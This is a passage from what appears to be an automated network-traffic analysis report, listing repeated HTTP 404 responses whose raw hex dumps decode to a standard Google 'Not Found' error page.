64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:24 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:09:29 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 